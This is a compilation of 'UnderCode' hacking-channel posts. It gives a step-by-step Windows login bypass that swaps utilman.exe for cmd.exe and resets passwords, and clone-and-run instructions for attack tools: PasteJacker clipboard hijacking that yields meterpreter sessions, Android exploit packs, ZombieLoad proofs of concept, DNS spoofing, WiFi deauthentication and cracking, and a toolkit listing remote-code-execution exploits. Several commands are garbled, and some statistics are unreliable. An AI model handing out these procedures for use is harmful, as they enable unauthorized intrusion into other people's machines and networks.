- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑Trick to crack the password If you forgot your Windows Password fastest way by UndercOde:
(t.me/UnderCodeTestingOfficial)

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) get windows-10 bootlable DVD.

2) at bios settings Make sure your PC setup is configured to boot from DVD.

3) boot The Disk

4) Press SHIFT + F10 to open the Command prompt

5) Replace the utilman.exe with cmd.exe. (Utilman.exe is a built in Windows application that is designed to allow the user to configure Accessibility options such as the Magnifier, High Contrast Theme, Narrator and On Screen Keyboard before they log onto the system.)

> move d: \System32\utilman.exe d: \System32\utilman.exe.bak

7) Then copy :

copy d: \System32 \cmd.exe d: \System32 \ultiman.exe

8) Windows-10 is usually installed in Drive D:/ if you can not trace it by finding file using d:\windows\system32\utilman.exe, if can’t trace this file in current drive then try in another Drive.

9) After successfully moving utilman.exe, remove your bootable DVD and reboot your problematic windows-10 installation from same CMD prompt.

> wpeutil reboot

10) On the Windows Login page,

> Click Utility Manager Icon at Bottom left.

11) As we have already replaced Utility Manager EXE file with Command Prompt EXE, so it will get open CMD prompt. (Avoid error message)

12) Directly reset the windows-10 password from command prompt! It will not ask you for old password and direct reset your new password.

> net user <username> <new_password>

13) Now, the password has been changed successfully

> Exit from command prompt, Get to the Login screen and apply your new password

Written by UnderCode
Tested on lastest win version
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑 A gd collection of android Exploits and Hacks
(instagram.com/UnderCodeTestingCompany)

🦑Installisation & Run:

1) git clone https://github.com/sundaysec/Android-Exploits.git

> Recommend you grab exploitpack latest version

2) wget https://github.com/juansacco/exploitpack/archive/master.zip

3) Extract then Navigate into the folder and type:

> java -jar ExploitPack.jar

4) Load the exploits

Learn and hack

🦑OWASP Top 10 Mobile Risks:

1) Insecure Data Storage

2) Weak Server Side Controls

3) Insufficient Transport Layer Protection

4) Client Side Injection

5) Poor Authorization and Authentication

6) Improper Session Handling

7) Security Decisions Via Untrusted Inputs

8) Side Channel Data Leakage

9) Broken Cryptography

10) Sensitive Information Disclosure

Written by UnderCode
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑Different Types of Ransomware:
(t.me/UnderCodeTestingOfficial)

🦑CryptoLocker

CyptoLocker botnet is one of the oldest forms of cyber attacks which has been around for the past two decades. The CyptoLocker ransomware came into existence in 2013 when hackers used the original CryptoLocker botnet approach in ransomware.

CyptoLocker ransomware is the most destructive form of ransomware since it uses strong encryption algorithms. It is often impossible to decrypt (restore) the Crypto ransomware-infected computer and files without paying the ransom.

🦑WannaCry

WannaCry is the most widely known ransomware variant across the globe. The WannaCry ransomware has infected nearly 125,000 organizations in over 150 countries. Some of the alternative names given to the WannaCry ransomware are WCry or WanaCrypt0r.

🦑Bad Rabbit

Bad Rabbit is another strain of ransomware which has infected organizations across Russia and Eastern Europe. It usually spreads through a fake Adobe Flash update on compromised websites.

🦑Cerber

Cerber is another ransomware variant which targets cloud-based Office 365 users. Millions of Office 365 users have fallen prey to an elaborate phishing campaign carried out by the Cerber ransomware.

🦑Crysis

Crysis is a special type of ransomware which encrypts files on fixed drives, removable drives, and network drives. It spreads through malicious email attachments with double-file extension. It uses strong encryption algorithms making it difficult to decrypt within a fair amount of time.

🦑CryptoWall

CryptoWall is an advanced form of CryptoLocker ransomware. It came into existence since early 2014 after the downfall of the original CryptoLocker variant. Today, there are multiple variants of CryptoWall in existence. It includes CryptoDefense, CryptoBit, CryptoWall 2.0, and CryptoWall 3.0.

🦑GoldenEye

GoldenEye is similar to the infamous Petya ransomware. It spreads through a massive social engineering campaign that targets human resources departments. When a user downloads a GoldenEye-infected file, it silently launches a macro which encrypts files on the victim's computer.

🦑Jigsaw

Jigsaw is one of the most destructive types of ransomware which encrypts and progressively deletes the encrypted files until a ransom is paid. It starts deleting the files one after the other on an hourly basis until the 72-hour mark- when all the remaining files are deleted.

🦑Locky

Locky is another ransomware variant which is designed to lock the victim's computer and prevent them from using it until a ransom is paid. It usually spread through seemingly benign email message disguised as an invoice.

When a user opens the email attachment, the invoice gets deleted automatically, and the victim is directed to enable macros to read the document. When the victim enables macros, Locky begins encrypting multiple file types using AES encryption.

> Petya, NotPetya, TeslaCrypt, TorrentLocker, ZCryptor, etc., are some of the other ransomware variants that are well-known for their malicious activities.

Written by UnderCode
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑How Hack Systems (wINDOWS) with the automation of PasteJacking attacks? WORK TERMUX /KALI/PARROT/DEBIAN...
(instagram.com/UnderCodeTestingCompany)


🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

> Pastejacking is a method that malicious websites employ to take control of your computers’ clipboard and change its content to something harmful without your knowledge

> So here what I did is automating the original attack and adding two other tricks to fool the user, using HTML and CSS Will talk about it then added meterpreter sessions as I said before.

🦑How it WORKS:

1) The target opens an HTML page served by the tool and this page has anything that makes the user wants to copy from it and paste into the terminal. Ex: package installation instructions

2) Target copies anything from the page then in the background it gets replaced quickly with our liner.

3) The user pastes into the terminal and before he notices that the line he copied has been changed :

> The line gets executed by itself in the background (Without pressing enter)

> The terminal gets cleared.

> The user sees the terminal is usable again.

> You already got your meterpreter session by this time.

4) All of that happened in less than second and maybe the user thinks this is a bad program and he won't install it

🦑INSTALLISATION & RUN:

1) git clone https://github.com/D4Vinci/PasteJacker.git

2) sudo python3 -m pip install ./PasteJacker

3) sudo pastejacker

🦑Requirements:

1) Python 3 and setuptools module.

2) Linux or Unix-based system (Currently tested only on Kali Linux rolling and Ubuntu 16.04).

3) Third-party requirements like msfvenom but only if you are gonna use the msfvenom option, of course.

4) Third-party library ncurses-dev for Ubuntu

5) Root access.

Written by UnderCode
- - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑2019 HACKING AWESOME TOOL

> This repository contains four different proof-of-concept attacks showing ZombieLoad. It also includes four different victim applications to test the leakage in various scenarios.

> All demos are tested with an Intel Core i7-8650U, but they should work on any Linux system with any modern Intel Core or Xeon CPU since 2010. We provide three variants for Linux, which we tested on Ubuntu 18.04.1 LTS, and two variants for Windows, which we tested on Windows 10 (1803 build 17134.706).

> For best results, we recommend a fast CPU that supports Intel TSX (e.g. nearly any Intel Core i7-5xxx, i7-6xxx, or i7-7xxx).
(t.me/UnderCodeTestingOfficial)

🦑INSTALLISATION & RUN:

1) clone https://github.com/IAIK/ZombieLoad

2) cd Zombieload

3) sudo modprobe msr

4) cd module && make load

5) Then, run the attacker on one hyperthread as root:

> sudo taskset -c 3 ./leak

🦑MORE USAGES:

🦑Userspace Victim (Linux and Windows)

1) An unprivileged user application which constantly loads the same value from its memory.

> Run (Linux)

Simply run the victim on the same physical core but a different hyperthread as the attacker:

> taskset -c 7 ./secret.

2) You can also provide a secret letter to the victim application as a parameter, e.g., taskset -c 7 ./secret B to access memory containing 'B's. The default secret letter is 'X'.

3) As soon as the victim is started, there should be a clear signal in the attacker process, i.e., the bar for the leaked letter should get longer.

🦑Run (Windows)

1) Simply run the victim on the same physical core but a different hyperthread as the attacker: start /affinity 7 .\secret.exe. You can also provide a secret letter to the victim application as a parameter, e.g.,
> start /affinity 7 .\secret.exe B to access memory containing 'B's.

2) The default secret letter is 'X'.

3) As soon as the victim is started, there should be a clear signal in the attacker process, i.e., the bar for the leaked letter should get longer.
Kernel Victim (Linux only)

4) A kernel module which constantly loads the letter 'J'.
Run

5) Before running the victim, the kernel module has to be loaded into the kernel. This is done by running sudo insmod leaky.ko. Then, simply run the victim on the same physical core but a different hyperthread as the attacker: taskset -c 7 ./secret.

6) As soon as the victim is started, there should be a clear signal in the attacker process, i.e., the bar for the letter 'J' should get longer.
Intel SGX Victim (Linux only)

7) An Intel SGX enclave which constantly loads the letter 'S'. This victim requires that the SGX driver and SDK are installed.
Run

8) Simply run the victim on the same physical core but a different hyperthread as the attacker: taskset -c 7 ./secret.

9) As soon as the victim is started, there should be a clear signal in the attacker process, i.e., the bar for the letter 'S' should get longer.
VM Victim (Linux and Windows)

10) A virtual machine containing an application which constantly loads the same value from its memory. This victim requires that QEMU is installed, and VT-x is enabled.

Written by UnderCode
- - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

- - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑Some commun attacks for Servers
(instagram.com/UnderCodeTestingCompany)

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1> The DROWN (Decrypting RSA with Obsolete and Weakened eNcryption) attack is a cross-protocol security bug that attacks servers supporting modern SSLv3/TLS protocol suites by using their support for the obsolete,

2> insecure, SSL v2 protocol to leverage an attack on connections using up-to-date protocols that would otherwise be secure.


3> DROWN can affect all types of servers that offer services encrypted with SSLv3/TLS yet still support SSLv2, provided they share the same public key credentials between the two protocols.[3]

4> Additionally, if the same public key certificate is used on a different server that supports SSLv2, the TLS server is also vulnerable due to the SSLv2 server leaking key information that can be used against the TLS server

5> Full details of DROWN were announced in March 2016, along with a patch that disables SSLv2 in OpenSSL; the vulnerability was assigned the ID CVE-2016-0800.[4] The patch alone will not be sufficient to mitigate the attack if the certificate can be found on another SSLv2 host. The only viable countermeasure is to disable SSLv2 on all servers.

6> The researchers estimated that 33% of all HTTPS sites were affected by this vulnerability as of March 1, 2016

🦑Protections against This Attacks:

1) To protect against DROWN, server operators need to ensure that their private keys are not used anywhere with server software that allows SSLv2 connections. This includes web servers, SMTP servers, IMAP and POP servers, and any other software that supports SSL/TLS.[8]

2) The OpenSSL group has released a security advisory, and a set of patches intended to mitigate the vulnerability by removing support for obsolete protocols and ciphers.[9] However, if the server's certificate is used on other servers that support SSLv2, it is still vulnerable, and so are the patched servers.

3) Numerous sources have recommended that the vulnerability be patched as soon as possible by site operators.


Written by UnderCode
- - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑A gd hacking tool for kali/termux The OneSiTyOne
Fast SNMP Scanner
(instagram.com/UnderCodeTestingCompany)

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

The SNMP protocol is a stateless, datagram oriented protocol. An SNMP scanner is a program that sends SNMP requests to multiple IP addresses, trying different community strings and waiting for a reply. Unfortunately SNMP servers don't respond to requests with invalid community strings and the underlying UDP protocol does not reliably report closed UDP ports. This means that 'no response' from the probed IP address can mean either of the following:

1) machine unreachable

2) SNMP server not running

3) invalid community string

4) the response datagram has not yet arrived

🦑INSTALLISATION & RUN:

1) git clone https://github.com/trailofbits/onesixtyone

2) cd onesixtyone

3) Linux, FreeBSD, OpenBSD:

> gcc -o onesixtyone onesixtyone.c

🦑Solaris:

> gcc -o onesixtyone onesixtyone.c -lsocket -lnsl

Installation is not necessary, just run the program from the current directory.
If you wish you may copy it to /usr/local/bin

🦑MORE :

> The approach taken by most SNMP scanners is to send the request, wait for n seconds and assume that the community string is invalid. If only 1 of every hundred scanned IP addresses responds to the SNMP request, the scanner will spend 99*n seconds waiting for replies that will never come. This makes traditional SNMP scanners very inefficient.

> onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them, in a fashion similar to Nmap ping sweeps. By default onesixtyone waits for 10 milliseconds between sending packets, which is adequate for 100MBs switched networks. The user can adjust this value via the -w command line option. If set to 0, the scanner will send packets as fast as the kernel would accept them, which may lead to packet drop.

> Running onesixtyone on a class B network (switched 100MBs with 1Gbs backbone) with -w 10 gives us a performance of 3 seconds per class C, with no dropped packets. All 65536 IP addresses were scanned in less than 13 minutes. onesixtyone sends a request for the system.sysDescr.0 value, which is present on almost all SNMP enabled devices. This returned value gives us a description of the system software running on the device

Written by UnderCode
-- - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑2019 tested by UnderCode Information Gathering Tool For Instagram.
like Username, Profile Name, URL, Followers, Following, Number of Posts, Bio, Profile Picture URL, Is Business Account ?, Connected to a FB account ?, External URL, Joined Recently ?, Business Category Name, Is private ?, Is Verified ?, Downloads Public Photos
> Check Our at instagram.com/UnderCodeTestingCompany

🦑INSTALLISATION & RUN:

( TERMUX OR ANY LINUX DISTRO)

1) pkg install -y git python

2) git clone https://github.com/th3unkn0n/osi.ig.git

3) cd osi.ig

4) chmod +x install.sh && ./install.sh

5) python3 main.py


THATS ALL

Written by UnderCode
- - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

T.me/UnderCodeTestingOfficial

# Support & Share

- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑 PreInstalled kali tool DNSChef Package Description
(instagram.com/UnderCodeTestingCompany)

WHAT IS DNS CHEF ?

> DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts.

> A DNS proxy (aka “Fake DNS”) is a tool used for application network traffic analysis among other uses. For example, a DNS proxy can be used to fake requests for “badguy.com” to point to a local machine for termination or interception instead of a real host somewhere on the Internet.

> Most will simply point all DNS queries a single IP address or implement only rudimentary filtering. DNSChef was developed as part of a penetration test where there was a need for a more configurable system.

> As a result, DNSChef is cross-platform application capable of forging responses based on inclusive and exclusive domain lists, supporting multiple DNS record types, matching domains with wildcards, proxying true responses for nonmatching domains, defining external configuration files, IPv6 and many other features. You can find detailed explanation of each of the features and suggested uses below.

> The use of DNS Proxy is recommended in situations where it is not possible to force an application to use some other proxy server directly. For example, some mobile applications completely ignore OS HTTP Proxy settings. In these cases, the use of a DNS proxy server such as DNSChef will allow you to trick that application into forwarding connections to the desired destination.

oFFICIAL Source: http://thesprawl.org/projects/dnschef/

🦑How to Use?

> root@kali:~# dnschef -h


> dnschef.py [options]:
_
Written by UnderCode
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑What is exactly definition for dns?
(t.me/UnderCodeTestingOfficial)

🦑DNS

1) The Domain Name System (DNS) is the phonebook of the Internet. Humans access information online through domain names, like nytimes.com or espn.com. Web browsers interact through Internet Protocol (IP) addresses. DNS translates domain names to IP addresses so browsers can load Internet resources.

2) Each device connected to the Internet has a unique IP address which other machines use to find the device.

3) DNS servers eliminate the need for humans to memorize IP addresses such as 192.168.1.1 (in IPv4), or more complex newer alphanumeric IP addresses such as 2400:cb00:2048:1::c629:d7a2 (in IPv6).

🦑How does DNS work?

1) The process of DNS resolution involves converting a hostname (such as www.example.com) into a computer-friendly IP address (such as 192.168.1.1).

2) An IP address is given to each device on the Internet, and that address is necessary to find the appropriate Internet device - like a street address is used to find a particular home. When a user wants to load a webpage, a translation must occur between what a user types into their web browser (example.com) and the machine-friendly address necessary to locate the example.com webpage.

3) In order to understand the process behind the DNS resolution, it’s important to learn about the different hardware components a DNS query must pass between. For the web browser, the DNS lookup occurs “ behind the scenes” and requires no interaction from the user’s computer apart from the initial request.

@ Mr BotNet(tm)
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑All dns Servers Types:
t.me/UnderCodeTestingOfficial)

🦑There are 4 DNS servers involved in loading a webpage:


1) DNS recursor -

> The recursor can be thought of as a librarian who is asked to go find a particular book somewhere in a library. The DNS recursor is a server designed to receive queries from client machines through applications such as web browsers. Typically the recursor is then responsible for making additional requests in order to satisfy the client’s DNS query.


2) Root nameserver -

> The root server is the first step in translating (resolving) human readable host names into IP addresses. It can be thought of like an index in a library that points to different racks of books - typically it serves as a reference to other more specific locations.


3) TLD nameserver -

> The top level domain server (TLD) can be thought of as a specific rack of books in a library. This nameserver is the next step in the search for a specific IP address, and it hosts the last portion of a hostname (In example.com, the TLD server is “com”).

4) Authoritative nameserver -

> This final nameserver can be thought of as a dictionary on a rack of books, in which a specific name can be translated into its definition. The authoritative nameserver is the last stop in the nameserver query. If the authoritative name server has access to the requested record, it will return the IP address for the requested hostname back to the DNS Recursor (the librarian) that made the initial request.

🦑What's the difference between an authoritative DNS server and a recursive DNS resolver?

1) Both concepts refer to servers (groups of servers) that are integral to the DNS infrastructure, but each performs a different role and lives in different locations inside the pipeline of a DNS query. One way to think about the difference is the recursive resolver is at the beginning of the DNS query and the authoritative nameserver is at the end.
Recursive DNS resolver

2) The recursive resolver is the computer that responds to a recursive request from a client and takes the time to track down the DNS record. It does this by making a series of requests until it reaches the authoritative DNS nameserver for the requested record (or times out or returns an error if no record is found).

3) Luckily, recursive DNS resolvers do not always need to make multiple requests in order to track down the records needed to respond to a client; caching is a data persistence process that helps short-circuit the necessary requests by serving the requested resource record earlier in the DNS lookup

@ Mr BotNet(tm)
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑
DNS Spoofing tool made in Python 3 with Scapy☠️kali/Termux
(t.me/UnderCodeTestingOfficial)

🦑INSTALLISATION & RUN:

1) git clone https://github.com/Trackbool/DerpNSpoof'


2) install the requirements with:

> 'pip3 install -r requirements.txt' (recomended) or manually 'pip3 install scapy'

> Scapy uses tcpdump

3) To execute the tool, you will need root permissions


4) Options to use:
<ip> - Spoof the DNS query packets of a certain IP address
<all> - Spoof the DNS query packets of all hosts
[!] Examples:
# python3 DerpNSpoof.py 192.168.1.20 myfile.txt
# python3 DerpNSpoof.py all myfile.txt

@ Mr BotNet(tm)
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑 Kali Linux Burp Suite Tutorial :
(instagram.com/UnderCodeTestingCompany)

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

> Burpsuite is a collection of tools bundled into a single suite made for Web Application Security or Penetration testing. It’s a java executable and hence it’s cross-platform. Kali Linux comes with Buprsuite free edition installed. There is also a professional version available.

🦑Features include:


1) Application-Aware Spider: Used for spidering/crawling a given scope of pages.

2) Scanner: Automatically scans for vulnerabilities just like any other automated scanners

3) Intruder: Used to perform attacks & brute-forces on pages in a highly customize-able manner.

4) Repeater: Used for manipulating and resending individual requests.

5) Sequencer: Used mainly for testing/fuzzing session tokens.

6) Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.

7) Comparer & Decoder used for misc purposes that might come along the way when you conduct a Web Security test


🦑How Hack With it?

> Spidering a website

Spidering is a major part of recon while performing Web security tests. It helps the pentester to identify the scope & archetecture of the web-application.As described earlier, burpsuite has it’s own spider called the burp spider which can crawl into a website.

1) Setup Proxy

First, start burpsuite and check details under the proxy tab in Options sub-tab. Ensure IP is localhost IP & port is 8080.

> on IceWeasel/Firefox, Goto Options > Preferences > Network > Connection Settings.

> Choose Manual Proxy Configuration

2) Getting Content into Burpsuite

> After you have setup the proxy, goto the target normally by entering the URL in the address bar. You can notice that the page will not be loading up.

> This is because burpsuite is intercepting the connection.

3) Scope Selection & Starting Spider

> Now narrow down the target as you want. Here the target/mutillidae is selected. Right click the mutillidae from the sitemap & select Spider from Here option

4) Manipulating Details

Now you can see as the spider runs on your screan , the tree inside of the mutillidae branch gets populated. Also, the requests made are shown in the queue and the details are shown in the Request tab.

5) Move on to different Tabs and see all the underlying information.

6) Finally, check if the spider is finished by viewing the Spider tab.

@ Mr BotNet(tm)
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑 How to hack a website using Termux
(t.me/UnderCodeTestingOfficial)

🦑INSTALLISATION & RUN:

Hackerpro - All in One Hacking Tool for Linux & Android (Termux)

A) Installation for Android

1) install termux

2) apt update

3) apt upgrade

4) apt install git

5) apt install pythongit clone https://github.com/technicaldada/hackerpro.gitcd hackerpro

6) python hackerpro.py

B) Installation for Linux

1) git clone https://github.com/technicaldada/hackerpro.git

2) cd hackerpro

3) python hackerpro.py python hackerpro.py

🦑Features:


Information Gathering
Password Attacks
Wireless Testing
Exploitation Tools
Sniffing & Spoofing
Web Hacking
Private Web Hacking
Post Exploitation
Install The HACKERPRO

🦑Information Gathering

Nmap
Setoolkit
Port Scanning
Host To IP
wordpress user
CMS scanner
XSStrike
Dork - Google Dorks Passive Vulnerability Auditor
Scan A server's Users
Crips

🦑Password Attacks

Cupp
Ncrack

🦑Wireless Testing

reaver
pixiewps
Fluxion

🦑Exploitation Tools

ATSCAN
sqlmap
Shellnoob
commix
FTP Auto Bypass
jboss-autopwn

🦑Sniffing & Spoofing

Setoolkit
SSLtrip
pyPISHER
SMTP Mailer

🦑Web Hacking

Drupal Hacking
Inurlbr
Wordpress & Joomla Scanner
Gravity Form Scanner
File Upload Checker
Wordpress Exploit Scanner
Wordpress Plugins Scanner
Shell and Directory Finder
Joomla! 1.5 - 3.4.5 remote code execution
Vbulletin 5.X remote code execution
BruteX - Automatically brute force all services running on a target
Arachni - Web Application Security Scanner Framework

🦑Private Web Hacking

Get all websites
Get joomla websites
Get wordpress websites
Control Panel Finder
Zip Files Finder
Upload File Finder
Get server users
SQli Scanner
Ports Scan (range of ports)
ports Scan (common ports)
Get server Info
Bypass Cloudflare

🦑Post Exploitation

Shell Checker
POET
Weeman
@ Mr BotNet(tm)
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑Hack Wifi Termux or /linux gd tool:
(instagram.com/UnderCodeTestingCompany)

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) Hijacker is a Graphical User Interface for the penetration testing tools Aircrack-ng, Airodump-ng, MDK3 and Reaver. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses.

2) This application requires an ARM android device with an internal wireless adapter that supports Monitor Mode. A few android devices do, but none of them natively. This means that you will need a custom firmware. Any device that uses the BCM4339 chipset (MSM8974, such as Nexus 5, Xperia Z1/Z2, LG G2, LG G Flex, Samsung Galaxy Note 3) will work with Nexmon (which also supports some other chipsets). Devices that use BCM4330 can use bcmon.

> An alternative would be to use an external adapter that supports monitor mode in Android with an OTG cable.

3) The required tools are included for ARM devices. The Nexmon firmware and management utility for BCM4339 and BCM4358 are also included.

🦑Root access is also necessary, as these tools need root to work.🦑
INSTALLISATION & RUN:

1) you are on Android 5+

2) you are rooted

3) you have a firmware to support Monitor Mode on your wireless interface

4) download the project https://github.com/chrisk44/Hijacker/releases/tag/v1.5-beta.11

You can get it apk or .tar.gz (or source .zip)

5) Simply get apk on android


🦑Features:

1) View a list of access points and stations (clients) around you (even hidden ones)

2) View the activity of a specific network (by measuring beacons and data packets) and its clients

3) Statistics about access points and stations

4) See the manufacturer of a device (AP or station) from the OUI database

5) See the signal power of devices and filter the ones that are closer to you

6) Save captured packets in .cap file

7) Deauthenticate all the clients of a network (either targeting each one (effective) or without specific target)

8) Deauthenticate a specific client from the network it's connected

9) MDK3 Beacon Flooding with custom options and SSID list

10) MDK3 Authentication DoS for a specific network or to every nearby AP

11) Capture a WPA handshake or gather IVs to crack a WEP network

12) Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter)

13) Leave the app running in the background, optionally with a notification
14) Copy commands or MAC addresses to clipboard
15) Includes the required tools, no need for manual installation
16) Includes the Nexmon driver, required library and management utility for BCM4339 and BCM4358 devices

17) Crack .cap files with a custom wordlist

18) Create custom actions and run them on an access point or a client easily

19) Sort and filter Access Points and Stations with many parameters

20) Export all gathered information to a file

21) Add a persistent alias to a device (by MAC) for easier identification

Written by UnderCode
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑Who uses Java? Why it Java the 1st choice for most developers?
t.me/IosDeveloppers


1) 97% of Enterprise Desktops Run Java

2) 89% of Desktops (or Computers) in the U.S. Run Java

3) There are 9 Million Java Developers Worldwide

4) Java is the #1 Choice for Developers

5) Java is the #1 Development Platform

6) 3 Billion Mobile Phones Run Java

7) 100% of Blu-ray Disc Players Ship with Java

8) There are 5 Billion Java Cards in Use

9) 125 million TV devices run Java

10) 5 of the Top 5 Original Equipment Manufacturers Ship Java ME.

@ ̵͑M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -

🦑Best Programming Languages for Hacking
facebook.com/UnderCodeTestingCompanie

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) Python

> The de-facto language for hacking programming, Python is heralded as the best programming language for hacking – and for good reasons so. Ethical hackers often use this dynamic programming language for scripting their on-demand hacking programs

Why Python?


> The interpreted nature of Python allows it to run without the need for compilation.

> An easy-to-read language that’s helpful for beginning ethical hackers.

> Has a massive community that wields useful 3rd-party plugins/library every day.

> One of the best programming language for hacking into web servers.

> Makes it fairly easy to write automation scripts.

> Python lets you do a fast reconnaissance of the target network and makes prototyping much faster.

2) SQL

> SQL stands for Structured Query Language and is one of the most favorite hacking programming language for ethical hackers. This programming language is used to query and fetch information from databases. As most web-based software store valuable information like user credentials in some form of a database,

> SQL is the best programming language for hacking into corporate databases

🦑¿Why sql?

> SQL is not a traditional programming language and used for only communicating with databases.

> hackers use this language to develop hacking programs based on SQL injection.

> SQL is often used by hackers to run unauthorized queries in order to obtain unhashed passwords.

> Popular SQL databases include MySQL, MS SQL, and PostgreSQL.

3) C

> The holy grail of modern programming languages, it’s no surprise C is also used extensively in the security industry. The low-level nature of C provides an edge over other languages used for hacking programming when it comes to accessing low-level hardware components such as the RAM

🦑¿ Why C ?

> C is a low-level fast programming language.

> Most modern systems including Windows and Unix are built using C, so mastery of this language is essential if you want to understand these systems thoroughly.

> C is often used to gain low-level access to memory and system processes after compromising a system.

> Veteran security professionals often use C to simulate the library highjacking attack.

4) JavaScript

> it s the de-facto choice for developing cross-site scripting hacking programs.

> JavaScript can manipulate the browser DOM very easily, thus making it a viable solution for building internet worms.
It can be used for mimicking attacks not only on the server side but also on the client side.

> JavaScript is the go-to language for creating adware hacking programs, rising increasingly in recent times.

> Since JavaScript can be used to build cross-platform desktop software, hackers might utilize it for attacks like buffer overflow and stack overflow.

5) PHP

> PHP is used extensively in server-side scripting, so knowledge of this hacking programming language is essential if you want to develop server hacking programs.

> Older PHP websites often contain deprecated scripts, manipulating them effectively can give you easy access to servers.

> A deeper understanding of this hacking coding language means you’ll be prepared to take down faulty websites as soon as you spot them.

> PHP is undoubtedly the best programming language for hacking personal websites.

6) C++

> The object-oriented nature of C++ allows hackers to write fast and efficient modern-day hacking programs.

> C++ is statically typed, meaning you can avoid a lot of trivial bugs right at compile time.

> The ability to access low-level system components makes sure hackers can easily reverse engineer enterprise software with this programming language.

> The high-level polymorphism feature allows programmers to write metamorphic computer viruses with C++.

7) JAva

> Just like C++, Java is also widely used by hackers to reverse engineer paid software.

> It is used heavily by professional penetration testers to curate scalable servers for delivering payloads.

> Java makes it possible to develop state of the art hacking programs for advanced ethical hackers.

> Contrary to C++, Java is dynamic in nature. This means once you write your hacking programs with Java, you can run them on any platform that supports Java.

> A deeper understanding of Java is integral to develop hacking programs for the Android system.

Written By ̵͑M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - -